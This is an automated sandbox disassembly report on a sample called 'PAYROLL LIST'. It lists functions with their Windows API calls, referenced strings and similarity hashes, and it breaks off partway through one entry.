Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 21460e3030bf6da8c3903d0a96a9729bd0622fa243bfc191623dec87726ae1fe
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: DE71C879E00F16ABD714AF78CD41BAA73A8BF81764F14422AF914D6682E770DD4487D0

Function 00A64DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A64DF8
GetMenuItemInfoW.USER32(00AE1708,000000FF,00000000,00000030), ref: 00A64E59
SetMenuItemInfoW.USER32(00AE1708,00000004,00000000,00000030), ref: 00A64E8F
Sleep.KERNEL32(000001F4), ref: 00A64EA1
GetMenuItemCount.USER32(?), ref: 00A64EE5
GetMenuItemID.USER32(?,00000000), ref: 00A64F01
GetMenuItemID.USER32(?,-00000001), ref: 00A64F2B
GetMenuItemID.USER32(?,?), ref: 00A64F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A64FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A64FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A64FEB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: aa0a23afafe0c7bf9b81537ad69b4725c003b25e49bd64ffab66cdc9a16d2b98
Instruction ID: d8edad07de77eaca327a9667cb8ec72aa8649b611c21c19094600235fbfe0913
Opcode Fuzzy Hash: aa0a23afafe0c7bf9b81537ad69b4725c003b25e49bd64ffab66cdc9a16d2b98
Instruction Fuzzy Hash: BA6190B190029AAFDB21CFA4DD88EEE7BB8FB49B04F144159F542A7291D731AD45CB20

Function 00A89C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A89C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A89C9B
GetWindowLongW.USER32(?,000000F0), ref: 00A89CBF
_memset.LIBCMT ref: 00A89CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A89CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A89D5A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 5bd5b4386a21be65c2448c81d04886b18f60282ec9cad445dcc1edce68e78479
Instruction ID: a1d71a679772cc4c5aabfc13f6a9f0c612c270dedde5f09c131531cf52f142d8
Opcode Fuzzy Hash: 5bd5b4386a21be65c2448c81d04886b18f60282ec9cad445dcc1edce68e78479
Instruction Fuzzy Hash: 5A617AB5900258AFDB11DFA8CC81EFEB7B8EB09704F14415AFA05EB291D774AD42DB50

Function 00A594E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00A594FE
SafeArrayAllocData.OLEAUT32(?), ref: 00A59549
VariantInit.OLEAUT32(?), ref: 00A5955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 00A5957B
VariantCopy.OLEAUT32(?,?), ref: 00A595BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00A595D2
VariantClear.OLEAUT32(?), ref: 00A595E7
SafeArrayDestroyData.OLEAUT32(?), ref: 00A595F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A595FD
VariantClear.OLEAUT32(?), ref: 00A5960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A5961A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9479c1ca04afb8f2398086e2eabca38d3abf313717619d5e395907c49e026f39
Instruction ID: be2af062499192fcbb9bc1738a7670488bac77a888ea7b23feef02782aee57af
Opcode Fuzzy Hash: 9479c1ca04afb8f2398086e2eabca38d3abf313717619d5e395907c49e026f39
Instruction Fuzzy Hash: 4A412B75900219EFCB01EFE4D8449DEBF79FF09355F008069F952A7251DB30AA4ACBA1

Function 00A7ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

CoInitialize.OLE32 ref: 00A7ADF6
CoUninitialize.OLE32 ref: 00A7AE01
CoCreateInstance.OLE32(?,00000000,00000017,00AAD8FC,?), ref: 00A7AE61
IIDFromString.OLE32(?,?), ref: 00A7AED4
VariantInit.OLEAUT32(?), ref: 00A7AF6E
VariantClear.OLEAUT32(?), ref: 00A7AFCF

Strings

Invalid parameter, xrefs: 00A7AEED
NULL Pointer assignment, xrefs: 00A7AEA6
Failed to create object, xrefs: 00A7AE6C, 00A7AF22

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 0cd666e985b569afffb61035b1611a57e6833e1a17f6dab96f3684f55f1a3049
Instruction ID: 4309ee6ebd3eaad75d7c7826f61c3e03e2fca57106fa2a3cb7acafd6dffe0c62
Opcode Fuzzy Hash: 0cd666e985b569afffb61035b1611a57e6833e1a17f6dab96f3684f55f1a3049
Instruction Fuzzy Hash: 8C619971208311AFD710DF64D948B6FBBE8AF99714F108819F98A9B291C770ED48CB93

Function 00A78107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A78168
inet_addr.WSOCK32(?), ref: 00A781AD
gethostbyname.WSOCK32(?), ref: 00A781B9
IcmpCreateFile.IPHLPAPI ref: 00A781C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A78237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A7824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A782C2
WSACleanup.WSOCK32 ref: 00A782C8

Strings

Ping, xrefs: 00A781EB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f5fe633267b7bb96f57ebc41d4ae557d2dac6bcab6cc85d8599b08ccc6bcdac6
Instruction ID: d3a33c3fc73d83d2fe145c90126aaef6870ef8b172c6cfb5565ac97dcd269333
Opcode Fuzzy Hash: f5fe633267b7bb96f57ebc41d4ae557d2dac6bcab6cc85d8599b08ccc6bcdac6
Instruction Fuzzy Hash: F151A0316447019FD710EF64DD49B6ABBE4AF49721F04C929F9AADB2E1DB34E801CB81

Function 00A89E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A89E5B
CreateMenu.USER32 ref: 00A89E76
SetMenu.USER32(?,00000000), ref: 00A89E85
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A89F12
IsMenu.USER32(?), ref: 00A89F28
CreatePopupMenu.USER32 ref: 00A89F32
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A89F63
DrawMenuBar.USER32 ref: 00A89F71

Strings

0, xrefs: 00A89E54

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 4d0749f26bcc6218c105b0314548e33e8ae8eb1c9f804b490fcbb07b3e8c8db2
Instruction ID: 7e16cb86264d2269f9e971a96a8f965b41a7b599c3963ca1c98f6295c7db0373
Opcode Fuzzy Hash: 4d0749f26bcc6218c105b0314548e33e8ae8eb1c9f804b490fcbb07b3e8c8db2
Instruction Fuzzy Hash: 3C416A74A00206AFDB14EFA4D884BEABBB5FF49314F184028FA46A7390D731AD10CF50

Function 00A6E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A6E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A6E40C
GetLastError.KERNEL32 ref: 00A6E416
SetErrorMode.KERNEL32(00000000,READY), ref: 00A6E483

Strings

READONLY, xrefs: 00A6E44E
NOTREADY, xrefs: 00A6E442
INVALID, xrefs: 00A6E455
READY, xrefs: 00A6E45C
UNKNOWN, xrefs: 00A6E43B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 2a3df5d9f58711242560156491d55ff5ba2673c493138b48c45c73e71c25c81f
Instruction ID: 375e0dcd72b524ebd9a81b8806ce6d88905b50ca86c98373a590977a604de1c0
Opcode Fuzzy Hash: 2a3df5d9f58711242560156491d55ff5ba2673c493138b48c45c73e71c25c81f
Instruction Fuzzy Hash: 7F316639A00205AFDB01EFB8D949ABD77B4FF45710F148426E506EB2D1DB719A06C791

Function 00A5B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A5B98C
GetDlgCtrlID.USER32 ref: 00A5B997
GetParent.USER32 ref: 00A5B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A5B9B6
GetDlgCtrlID.USER32(?), ref: 00A5B9BF
GetParent.USER32(?), ref: 00A5B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A5B9DE

Strings

ComboBox, xrefs: 00A5B911
ListBox, xrefs: 00A5B949

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 24f366ac35634ee9b2682d2edee73c7c7dbe141610cb826ad2d8e10d955e1d1f
Instruction ID: 20dc607a8dfdb3b0ca52af80ad549f2d7c7a395b4dc49779551b06f3a60661a1
Opcode Fuzzy Hash: 24f366ac35634ee9b2682d2edee73c7c7dbe141610cb826ad2d8e10d955e1d1f
Instruction Fuzzy Hash: B221A174900105BFDB04EBA4DC86EFEBB75FB5A311B10011AFA52972E1DB74581ADB60

Function 00A5B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A5BA73
GetDlgCtrlID.USER32 ref: 00A5BA7E
GetParent.USER32 ref: 00A5BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A5BA9D
GetDlgCtrlID.USER32(?), ref: 00A5BAA6
GetParent.USER32(?), ref: 00A5BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A5BAC5

Strings

ComboBox, xrefs: 00A5B9FA
ListBox, xrefs: 00A5BA32

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 1e200ec1d97c47b73515be565742e9e97b8ca7deb8be796e168f419da8907378
Instruction ID: 37aa0d5c730d2cb912eab2dc7d55549d8fb7b419e6fa9c9356e76b59e8e1eb92
Opcode Fuzzy Hash: 1e200ec1d97c47b73515be565742e9e97b8ca7deb8be796e168f419da8907378
Instruction Fuzzy Hash: 1C219DB4A00108BBDB04EBA4DC85EBEBB79FB45341F100015F952A72A2DBB9591ADB20

Function 00A5BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00A5BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 00A5BAF8
_wcscmp.LIBCMT ref: 00A5BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A5BB85

Strings

largeicons, xrefs: 00A5BB19
list, xrefs: 00A5BB67
SHELLDLL_DefView, xrefs: 00A5BB04
smallicons, xrefs: 00A5BB4D
details, xrefs: 00A5BB33

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 9ea08a11d05d23baa7c71066d4065b972d7ac5f634de9de6dcbfeff7ae7a7a65
Instruction ID: 7a16a125daaf420d2dae6c0a4ef6fcbe8370beeb5280866824f63f3e654a9552
Opcode Fuzzy Hash: 9ea08a11d05d23baa7c71066d4065b972d7ac5f634de9de6dcbfeff7ae7a7a65
Instruction Fuzzy Hash: 9611367A218703F9FA246720EC07DA637ACFB61362B200022FE05E00E5FBF168169634

Function 00A7B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A7B2D5
CoInitialize.OLE32(00000000), ref: 00A7B302
CoUninitialize.OLE32 ref: 00A7B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 00A7B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A7B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00A7B56D
CoGetObject.OLE32(?,00000000,00AAD91C,?), ref: 00A7B590
SetErrorMode.KERNEL32(00000000), ref: 00A7B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A7B623
VariantClear.OLEAUT32(00AAD91C), ref: 00A7B633

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: a784b4f786ac2c1fd34339d1dee3e0d9c3285e3d8dff5c1fe0a6cc8bca5c54a1
Instruction ID: 52d5634cf2a651699def91c334c15cff46633cdc6ad6c8d2aeb61ed039790dec
Opcode Fuzzy Hash: a784b4f786ac2c1fd34339d1dee3e0d9c3285e3d8dff5c1fe0a6cc8bca5c54a1
Instruction Fuzzy Hash: 28C104B1618305AFD700DF68C884A6BBBE9BF89304F00895DF58ADB251DB71ED05CB62

Function 00A667E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00A667FD
__swprintf.LIBCMT ref: 00A6680A

Part of subcall function 00A4172B: __woutput_l.LIBCMT ref: 00A41784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00A66834
LoadResource.KERNEL32(?,00000000), ref: 00A66840
LockResource.KERNEL32(00000000), ref: 00A6684D
FindResourceW.KERNEL32(?,?,00000003), ref: 00A6686D
LoadResource.KERNEL32(?,00000000), ref: 00A6687F
SizeofResource.KERNEL32(?,00000000), ref: 00A6688E
LockResource.KERNEL32(?), ref: 00A6689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00A668F9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 9f2d9118ad1fd385823f00ac6c29c24596dcc460d2fce9f06dff914102bc481e
Instruction ID: 42d1daf9d226e8fa7341dbd4c605a08aa921f8dee3109ce6c096f3f8a76873c2
Opcode Fuzzy Hash: 9f2d9118ad1fd385823f00ac6c29c24596dcc460d2fce9f06dff914102bc481e
Instruction Fuzzy Hash: 6A318C7190025AABDB10DFB1DD85ABA7BB8EF09340F008425F942E7190E734D956DBA0

Function 00A9DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A3B496
SetTextColor.GDI32(?,000000FF), ref: 00A3B4A0
SetBkMode.GDI32(?,00000001), ref: 00A3B4B5
GetStockObject.GDI32(00000005), ref: 00A3B4BD
GetClientRect.USER32(?), ref: 00A9DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 00A9DD7A
GetWindowDC.USER32(?), ref: 00A9DD86
GetPixel.GDI32(00000000,?,?), ref: 00A9DD95
ReleaseDC.USER32(?,00000000), ref: 00A9DDA7
GetSysColor.USER32(00000005), ref: 00A9DDC5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 9900cf2fb72db5da99422a61a3e11e608df019e8f30dfe3b3f1acbfcaf4b1963
Instruction ID: 0dd1abcbb2d671aac2bd212dbaee0ecda3b97fc0e6679299e616f4ec22fc8e3e
Opcode Fuzzy Hash: 9900cf2fb72db5da99422a61a3e11e608df019e8f30dfe3b3f1acbfcaf4b1963
Instruction Fuzzy Hash: D4115131510206EFDB51AFB4EC08BE97BB2EB06325F108625FAA6954E1CB310982DF20

Function 00A5CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00A5CF50), ref: 00A5CE90

Strings

INSTANCE, xrefs: 00A5CD9E
CLASSNN, xrefs: 00A5CC33
NAME, xrefs: 00A5CCC2
TEXT, xrefs: 00A5CDC7
CLASS, xrefs: 00A5CC10
REGEXPCLASS, xrefs: 00A5CC56

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 170556896dbb3ba4f0fc9f7d64cf8f99356f5293742045f38c055f834debb0c6
Instruction ID: 72f41abcbe68d65a47e12fdd5b60bd2709360ad168cb4dde39e40e90c54ba1d2
Opcode Fuzzy Hash: 170556896dbb3ba4f0fc9f7d64cf8f99356f5293742045f38c055f834debb0c6
Instruction Fuzzy Hash: CC918130600606AECB18DF60C582BEEFB75BF04311F50852AEC5AA7295DF30A95ECBD0

Function 00A23093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A230DC
CoUninitialize.OLE32(?,00000000), ref: 00A23181
UnregisterHotKey.USER32(?), ref: 00A232A9
DestroyWindow.USER32(?), ref: 00A95079
FreeLibrary.KERNEL32(?), ref: 00A950F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A95125

Strings

